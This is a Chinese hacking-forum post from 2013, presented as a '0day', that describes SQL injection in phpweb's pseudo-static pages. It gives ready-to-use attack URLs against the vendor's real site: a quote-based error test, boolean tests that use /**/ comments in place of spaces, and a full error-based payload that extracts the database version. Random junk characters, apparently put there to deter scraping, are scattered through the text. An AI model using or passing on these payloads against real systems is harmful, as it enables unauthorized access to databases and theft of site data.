找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 phpweb伪静态页面注入0day
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2277|回复: 0
打印 上一主题 下一主题

phpweb伪静态页面注入0day

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-4 19:46:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
phpweb所有的整站程序伪静态页面都存在sql注入
3 `9 P" E6 H, e. W* g
% ^! _$ K  O% C" e: m5 O主站:http://phpweb.net/
: p, I8 F" C) q) W加’检测:
: Y& t# r- ^) `& m0 s9 D 1 k$ h, D" g, L3 t% F
http://www.phpweb.net/down/html/?772′.html
0 S+ Z. \& [& z" c) ^ ) w) N# T- r. j* c' A" m1 O
出错/ q, j8 Q7 D: g" C5 w
存在注入。6 Y) w" _  D# a/ g
不能用空格,只能用/*罗
) h% t% U" _5 x% qhttp://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
9 ~+ s2 }+ C; n  r* ^5 C; }  j! w. o9 Z 4 B# j) k+ K, G0 K5 ]. f% f
http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.
# z9 i  x% i8 B爆数据库版本:2 ?6 ^9 ]. U, I
. f6 b5 M* j. O' q0 I/ n0 @
?4 ^0 R( O% N! v3 d7 ^: A8 B7 P7 X
1
7 ^1 Z/ F3 k  y8 Qhttp://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
: K  ~# M. Y4 u2 b& g更新日期: 2013-01-03 13:39:50        
0 g  T6 y2 B* |$ _7 y* m) p
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表